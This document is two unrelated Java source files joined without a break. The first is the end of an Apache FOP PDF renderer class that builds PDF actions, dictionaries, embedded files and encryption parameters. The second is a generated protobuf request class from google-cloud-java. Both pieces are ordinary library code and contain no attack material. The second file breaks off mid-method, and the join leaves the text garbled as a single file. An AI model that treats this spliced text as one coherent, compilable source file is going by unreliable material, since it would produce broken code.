makeDictionary(extension.findEntryValue("Usage")); getLayer().populate(name, intent, usage); } }); } } public void addNavigatorAction(PDFDictionaryExtension extension) { assert extension.getDictionaryType() == PDFDictionaryType.Action; String id = extension.getProperty(PDFDictionaryExtension.PROPERTY_ID); if ((id != null) && (id.length() > 0)) { String type = extension.getProperty(PDFActionExtension.PROPERTY_TYPE); if (type != null) { if (type.equals("SetOCGState")) { PDFSetOCGStateAction action = pdfDoc.getFactory().makeSetOCGStateAction(id); action.setResolver(new PDFSetOCGStateAction.Resolver(action, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object state = makeArray(extension.findEntryValue("State")); Object preserveRB = extension.findEntryValue("PreserveRB"); Object nextAction = makeDictionaryOrArray(extension.findEntryValue("Next")); getAction().populate(state, preserveRB, nextAction); } }); } else if (type.equals("Trans")) { PDFTransitionAction action = pdfDoc.getFactory().makeTransitionAction(id); action.setResolver(new PDFTransitionAction.Resolver(action, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object transition = makeDictionary(extension.findEntryValue("Trans")); Object nextAction = makeDictionaryOrArray(extension.findEntryValue("Next")); getAction().populate(transition, nextAction); } }); } else { throw new UnsupportedOperationException(); } } } } public void addNavigator(PDFDictionaryExtension extension) { assert extension.getDictionaryType() == PDFDictionaryType.Navigator; String id = extension.getProperty(PDFDictionaryExtension.PROPERTY_ID); if ((id != null) && (id.length() > 0)) { PDFNavigator navigator = pdfDoc.getFactory().makeNavigator(id); navigator.setResolver(new PDFNavigator.Resolver(navigator, extension) { public void performResolution() { PDFDictionaryExtension extension = (PDFDictionaryExtension) getExtension(); Object nextAction = makeDictionary(extension.findEntryValue("NA")); Object next = makeDictionary(extension.findEntryValue("Next")); Object prevAction = makeDictionary(extension.findEntryValue("PA")); Object prev = makeDictionary(extension.findEntryValue("Prev")); Object duration = extension.findEntryValue("Dur"); getNavigator().populate(nextAction, next, prevAction, prev, duration); } }); } } private Object makeArray(Object value) { if (value == null) { return null; } else if (value instanceof PDFReferenceExtension) { return resolveReference((PDFReferenceExtension) value); } else if (value instanceof List<?>) { return populateArray(new PDFArray(), (List<?>) value); } else { throw new IllegalArgumentException(); } } private Object populateArray(PDFArray array, List<?> entries) { for (PDFCollectionEntryExtension entry : (List<PDFCollectionEntryExtension>) entries) { PDFObjectType type = entry.getType(); if (type == PDFObjectType.Array) { array.add(makeArray(entry.getValue())); } else if (type == PDFObjectType.Boolean) { array.add(entry.getValueAsBoolean()); } else if (type == PDFObjectType.Dictionary) { array.add(makeDictionary(entry.getValue())); } else if (type == PDFObjectType.Name) { array.add(new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { array.add(new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert (entry instanceof PDFReferenceExtension); array.add(resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { array.add(entry.getValue()); } } return array; } private Object makeDictionary(Object value) { if (value == null) { return null; } else if (value instanceof PDFReferenceExtension) { return resolveReference((PDFReferenceExtension) value); } else if (value instanceof List<?>) { return populateDictionary(new PDFDictionary(), (List<?>) value); } else { throw new IllegalArgumentException(); } } private Object populateDictionary(PDFDictionary dictionary, List<?> entries) { for (PDFCollectionEntryExtension entry : (List<PDFCollectionEntryExtension>) entries) { PDFObjectType type = entry.getType(); String key = entry.getKey(); if (type == PDFObjectType.Array) { dictionary.put(key, makeArray(entry.getValue())); } else if (type == PDFObjectType.Boolean) { dictionary.put(key, entry.getValueAsBoolean()); } else if (type == PDFObjectType.Dictionary) { dictionary.put(key, makeDictionary(entry.getValue())); } else if (type == PDFObjectType.Name) { dictionary.put(key, new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { dictionary.put(key, new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert (entry instanceof PDFReferenceExtension); dictionary.put(key, resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { dictionary.put(key, entry.getValue()); } } return dictionary; } private Object makeDictionaryOrArray(Object value) { if (value == null) { return null; } else if (value instanceof PDFReferenceExtension) { return resolveReference((PDFReferenceExtension) value); } else if (value instanceof List<?>) { if (hasKeyedEntry((List<?>) value)) { return populateDictionary(new PDFDictionary(), (List<?>) value); } else { return populateArray(new PDFArray(), (List<?>) value); } } else { throw new IllegalArgumentException(); } } private boolean hasKeyedEntry(List<?> entries) { for (PDFCollectionEntryExtension entry : (List<PDFCollectionEntryExtension>) entries) { if (entry.getKey() != null) { return true; } } return false; } public void renderDictionaryExtension(PDFDictionaryExtension extension, PDFPage currentPage) { PDFDictionaryType type = extension.getDictionaryType(); if (type == PDFDictionaryType.Catalog) { augmentDictionary(pdfDoc.getRoot(), extension); } else if (type == PDFDictionaryType.Page) { assert extension instanceof PDFPageExtension; if (((PDFPageExtension) extension).matchesPageNumber(currentPage.getPageIndex() + 1)) { augmentDictionary(currentPage, extension); renderExtension(currentPage, extension.getExtension()); } } else if (type == PDFDictionaryType.Info) { PDFInfo info = pdfDoc.getInfo(); for (PDFCollectionEntryExtension entry : extension.getEntries()) { info.put(entry.getKey(), entry.getValueAsString()); } } else if (type == PDFDictionaryType.VT) { if (currentPage.get("DPart") != null) { augmentDictionary((PDFDictionary)currentPage.get("DPart"), extension); } } else if (type == PDFDictionaryType.PagePiece) { String date = DateFormatUtil.formatPDFDate(new Date(), TimeZone.getDefault()); if (currentPage.get("PieceInfo") == null) { currentPage.put("PieceInfo", new PDFDictionary()); currentPage.put("LastModified", date); } PDFDictionary d = augmentDictionary((PDFDictionary)currentPage.get("PieceInfo"), extension); d.put("LastModified", date); } else { throw new IllegalStateException(); } } private void renderExtension(PDFPage currentPage, ExtensionAttachment extension) { if (extension instanceof XMPMetadata) { XMPMetadata metadata = (XMPMetadata) extension; Metadata docXMP = metadata.getMetadata(); PDFMetadata pdfMetadata = pdfDoc.getFactory().makeMetadata(docXMP, metadata.isReadOnly()); currentPage.setMetadata(pdfMetadata); } } private PDFDictionary augmentDictionary(PDFDictionary dictionary, PDFDictionaryExtension extension) { for (PDFCollectionEntryExtension entry : extension.getEntries()) { if (entry instanceof PDFDictionaryExtension) { String[] keys = entry.getKey().split("/"); for (int i = 0; i < keys.length; i++) { if (keys[i].isEmpty()) { throw new IllegalStateException("pdf:dictionary key: " + entry.getKey() + " not valid"); } if (i == keys.length - 1) { dictionary.put(keys[i], augmentDictionary(new PDFDictionary(dictionary), (PDFDictionaryExtension) entry)); } else { PDFDictionary d = new PDFDictionary(); dictionary.put(keys[i], d); dictionary = d; } } } else if (entry instanceof PDFArrayExtension) { dictionary.put(entry.getKey(), augmentArray(new PDFArray(dictionary), (PDFArrayExtension) entry)); } else { augmentDictionary(dictionary, entry); } } return dictionary; } private void augmentDictionary(PDFDictionary dictionary, PDFCollectionEntryExtension entry) { PDFObjectType type = entry.getType(); String key = entry.getKey(); if (type == PDFObjectType.Boolean) { dictionary.put(key, entry.getValueAsBoolean()); } else if (type == PDFObjectType.Name) { dictionary.put(key, new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { dictionary.put(key, new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert entry instanceof PDFReferenceExtension; dictionary.put(key, resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { dictionary.put(key, entry.getValueAsString()); } else { throw new IllegalStateException(); } } private Object resolveReference(PDFReferenceExtension entry) { PDFReference reference = (PDFReference) entry.getResolvedReference(); if (reference == null) { reference = pdfDoc.resolveExtensionReference(entry.getReferenceId()); if (reference != null) { entry.setResolvedReference(reference); } return reference; } return PDFNull.INSTANCE; } private PDFArray augmentArray(PDFArray array, PDFArrayExtension extension) { for (PDFCollectionEntryExtension entry : extension.getEntries()) { if (entry instanceof PDFDictionaryExtension) { array.add(augmentDictionary(new PDFDictionary(array), (PDFDictionaryExtension) entry)); } else if (entry instanceof PDFArrayExtension) { array.add(augmentArray(new PDFArray(array), (PDFArrayExtension) entry)); } else { augmentArray(array, entry); } } return array; } private void augmentArray(PDFArray array, PDFCollectionEntryExtension entry) { PDFObjectType type = entry.getType(); if (type == PDFObjectType.Boolean) { array.add(entry.getValueAsBoolean()); } else if (type == PDFObjectType.Name) { array.add(new PDFName(entry.getValueAsString())); } else if (type == PDFObjectType.Number) { array.add(new PDFNumber(entry.getValueAsNumber())); } else if (type == PDFObjectType.Reference) { assert entry instanceof PDFReferenceExtension; array.add(resolveReference((PDFReferenceExtension) entry)); } else if (type == PDFObjectType.String) { array.add(entry.getValueAsString()); } else { throw new IllegalStateException(); } } public PDFDocument setupPDFDocument(OutputStream out) throws IOException { if (this.pdfDoc != null) { throw new IllegalStateException("PDFDocument already set up"); } String producer = userAgent.getProducer() != null ? userAgent.getProducer() : ""; final Version maxPDFVersion = rendererConfig.getPDFVersion(); if (maxPDFVersion == null) { this.pdfDoc = new PDFDocument(producer); } else { VersionController controller = VersionController.getFixedVersionController(maxPDFVersion); this.pdfDoc = new PDFDocument(producer, controller); } pdfDoc.getFactory().setEventBroadcaster(userAgent.getEventBroadcaster()); updateInfo(); updatePDFProfiles(); pdfDoc.setFilterMap(rendererConfig.getFilterMap()); pdfDoc.outputHeader(out); //Setup encryption if necessary PDFEncryptionManager.setupPDFEncryption(rendererConfig.getEncryptionParameters(), pdfDoc); addsRGBColorSpace(); if (rendererConfig.getOutputProfileURI() != null) { addDefaultOutputProfile(); } PDFXMode pdfXMode = rendererConfig.getPDFXMode(); if (pdfXMode != PDFXMode.DISABLED) { log.debug(pdfXMode + " is active."); log.warn("Note: " + pdfXMode + " support is work-in-progress and not fully implemented, yet!"); addPDFXOutputIntent(); } PDFAMode pdfAMode = rendererConfig.getPDFAMode(); if (pdfAMode.isEnabled()) { log.debug("PDF/A is active. Conformance Level: " + pdfAMode); addPDFA1OutputIntent(); } pdfDoc.enableAccessibility(userAgent.isAccessibilityEnabled()); pdfDoc.setStaticRegionsPerPageForAccessibility(userAgent.isStaticRegionsPerPageForAccessibility()); pdfDoc.setMergeFontsParams(rendererConfig.getMergeFontsParams()); pdfDoc.setMergeFormFieldsEnabled(rendererConfig.getMergeFormFieldsEnabled()); pdfDoc.setLinearizationEnabled(rendererConfig.getLinearizationEnabled()); pdfDoc.setFormXObjectEnabled(rendererConfig.getFormXObjectEnabled()); pdfDoc.setObjectStreamsEnabled(rendererConfig.getObjectStreamsEnabled()); return this.pdfDoc; } public PDFSignParams getSignParams() { return rendererConfig.getSignParams(); } /** * Generates a page label in the PDF document. * @param pageIndex the index of the page * @param pageNumber the formatted page number */ public void generatePageLabel(int pageIndex, String pageNumber) { //Produce page labels PDFPageLabels pageLabels = this.pdfDoc.getRoot().getPageLabels(); if (pageLabels == null) { //Set up PageLabels pageLabels = this.pdfDoc.getFactory().makePageLabels(); this.pdfDoc.getRoot().setPageLabels(pageLabels); } pageLabels.addPageLabel(pageIndex, pageNumber); } /** * Adds an embedded file to the PDF file. * @param embeddedFile the object representing the embedded file to be added * @throws IOException if an I/O error occurs */ public void addEmbeddedFile(PDFEmbeddedFileAttachment embeddedFile) throws IOException { this.pdfDoc.getProfile().verifyEmbeddedFilesAllowed(); PDFNames names = this.pdfDoc.getRoot().getNames(); if (names == null) { //Add Names if not already present names = this.pdfDoc.getFactory().makeNames(); this.pdfDoc.getRoot().setNames(names); } //Create embedded file PDFEmbeddedFile file = new PDFEmbeddedFile(); this.pdfDoc.registerObject(file); URI srcURI; try { srcURI = InternalResourceResolver.cleanURI(embeddedFile.getSrc()); } catch (URISyntaxException use) { throw new RuntimeException(use); } InputStream in = userAgent.getResourceResolver().getResource(srcURI); if (in == null) { throw new FileNotFoundException(embeddedFile.getSrc()); } try { OutputStream out = file.getBufferOutputStream(); IOUtils.copyLarge(in, out); } finally { IOUtils.closeQuietly(in); } PDFDictionary dict = new PDFDictionary(); dict.put("F", file); PDFFileSpec fileSpec = new PDFFileSpec(embeddedFile.getFilename(), embeddedFile.getUnicodeFilename()); String filename = fileSpec.getFilename(); pdfDoc.getRoot().addAF(fileSpec); fileSpec.setEmbeddedFile(dict); if (embeddedFile.getDesc() != null) { fileSpec.setDescription(embeddedFile.getDesc()); } this.pdfDoc.registerObject(fileSpec); //Make sure there is an EmbeddedFiles in the Names dictionary PDFEmbeddedFiles embeddedFiles = names.getEmbeddedFiles(); if (embeddedFiles == null) { embeddedFiles = new PDFEmbeddedFiles(); this.pdfDoc.assignObjectNumber(embeddedFiles); this.pdfDoc.addTrailerObject(embeddedFiles); names.setEmbeddedFiles(embeddedFiles); } //Add to EmbeddedFiles in the Names dictionary PDFArray nameArray = embeddedFiles.getNames(); if (nameArray == null) { nameArray = new PDFArray(); embeddedFiles.setNames(nameArray); } nameArray.add(filename); nameArray.add(new PDFReference(fileSpec)); } private static final class EncryptionParamsBuilder { private PDFEncryptionParams params; private EncryptionParamsBuilder() { } private PDFEncryptionParams createParams(FOUserAgent userAgent) { params = (PDFEncryptionParams) userAgent.getRendererOptions().get(ENCRYPTION_PARAMS); String userPassword = (String) userAgent.getRendererOption(USER_PASSWORD); if (userPassword != null) { getEncryptionParams().setUserPassword(userPassword); } String ownerPassword = (String) userAgent.getRendererOption(OWNER_PASSWORD); if (ownerPassword != null) { getEncryptionParams().setOwnerPassword(ownerPassword); } Object noPrint = userAgent.getRendererOption(NO_PRINT); if (noPrint != null) { getEncryptionParams().setAllowPrint(!booleanValueOf(noPrint)); } Object noCopyContent = userAgent.getRendererOption(NO_COPY_CONTENT); if (noCopyContent != null) { getEncryptionParams().setAllowCopyContent(!booleanValueOf(noCopyContent)); } Object noEditContent = userAgent.getRendererOption(NO_EDIT_CONTENT); if (noEditContent != null) { getEncryptionParams().setAllowEditContent(!booleanValueOf(noEditContent)); } Object noAnnotations = userAgent.getRendererOption(NO_ANNOTATIONS); if (noAnnotations != null) { getEncryptionParams().setAllowEditAnnotations(!booleanValueOf(noAnnotations)); } Object noFillInForms = userAgent.getRendererOption(NO_FILLINFORMS); if (noFillInForms != null) { getEncryptionParams().setAllowFillInForms(!booleanValueOf(noFillInForms)); } Object noAccessContent = userAgent.getRendererOption(NO_ACCESSCONTENT); if (noAccessContent != null) { getEncryptionParams().setAllowAccessContent(!booleanValueOf(noAccessContent)); } Object noAssembleDoc = userAgent.getRendererOption(NO_ASSEMBLEDOC); if (noAssembleDoc != null) { getEncryptionParams().setAllowAssembleDocument(!booleanValueOf(noAssembleDoc)); } Object noPrintHQ = userAgent.getRendererOption(NO_PRINTHQ); if (noPrintHQ != null) { getEncryptionParams().setAllowPrintHq(!booleanValueOf(noPrintHQ)); } return params; } private PDFEncryptionParams getEncryptionParams() { if (params == null) { params = new PDFEncryptionParams(); } return params; } private static boolean booleanValueOf(Object obj) { if (obj instanceof Boolean) { return (Boolean) obj; } else if (obj instanceof String) { return Boolean.valueOf((String) obj); } else { throw new IllegalArgumentException("Boolean or \"true\" or \"false\" expected."); } } } }
googleapis/google-cloud-java
35,895
java-compute/proto-google-cloud-compute-v1/src/main/java/com/google/cloud/compute/v1/RegionInstanceGroupManagerPatchInstanceConfigReq.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/compute/v1/compute.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.compute.v1; /** * * * <pre> * RegionInstanceGroupManagers.patchPerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq} */ public final class RegionInstanceGroupManagerPatchInstanceConfigReq extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) RegionInstanceGroupManagerPatchInstanceConfigReqOrBuilder { private static final long serialVersionUID = 0L; // Use RegionInstanceGroupManagerPatchInstanceConfigReq.newBuilder() to construct. private RegionInstanceGroupManagerPatchInstanceConfigReq( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private RegionInstanceGroupManagerPatchInstanceConfigReq() { perInstanceConfigs_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new RegionInstanceGroupManagerPatchInstanceConfigReq(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.class, com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.Builder .class); } public static final int PER_INSTANCE_CONFIGS_FIELD_NUMBER = 526265001; @SuppressWarnings("serial") private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public int getPerInstanceConfigsCount() { return perInstanceConfigs_.size(); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { return perInstanceConfigs_.get(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { return perInstanceConfigs_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < perInstanceConfigs_.size(); i++) { output.writeMessage(526265001, perInstanceConfigs_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < perInstanceConfigs_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize( 526265001, perInstanceConfigs_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq)) { return super.equals(obj); } com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq other = (com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) obj; if (!getPerInstanceConfigsList().equals(other.getPerInstanceConfigsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getPerInstanceConfigsCount() > 0) { hash = (37 * hash) + PER_INSTANCE_CONFIGS_FIELD_NUMBER; hash = (53 * hash) + getPerInstanceConfigsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * RegionInstanceGroupManagers.patchPerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReqOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.class, com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.Builder .class); } // Construct using // com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); } else { perInstanceConfigs_ = null; perInstanceConfigsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_descriptor; } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq getDefaultInstanceForType() { return com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq .getDefaultInstance(); } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq build() { com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq buildPartial() { com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result = new com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result) { if (perInstanceConfigsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = java.util.Collections.unmodifiableList(perInstanceConfigs_); bitField0_ = (bitField0_ & ~0x00000001); } result.perInstanceConfigs_ = perInstanceConfigs_; } else { result.perInstanceConfigs_ = perInstanceConfigsBuilder_.build(); } } private void buildPartial0( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) { return mergeFrom( (com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq other) { if (other == com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq .getDefaultInstance()) return this; if (perInstanceConfigsBuilder_ == null) { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigs_.isEmpty()) { perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.addAll(other.perInstanceConfigs_); } onChanged(); } } else { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigsBuilder_.isEmpty()) { perInstanceConfigsBuilder_.dispose(); perInstanceConfigsBuilder_ = null; perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); perInstanceConfigsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getPerInstanceConfigsFieldBuilder() : null; } else { perInstanceConfigsBuilder_.addAllMessages(other.perInstanceConfigs_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == 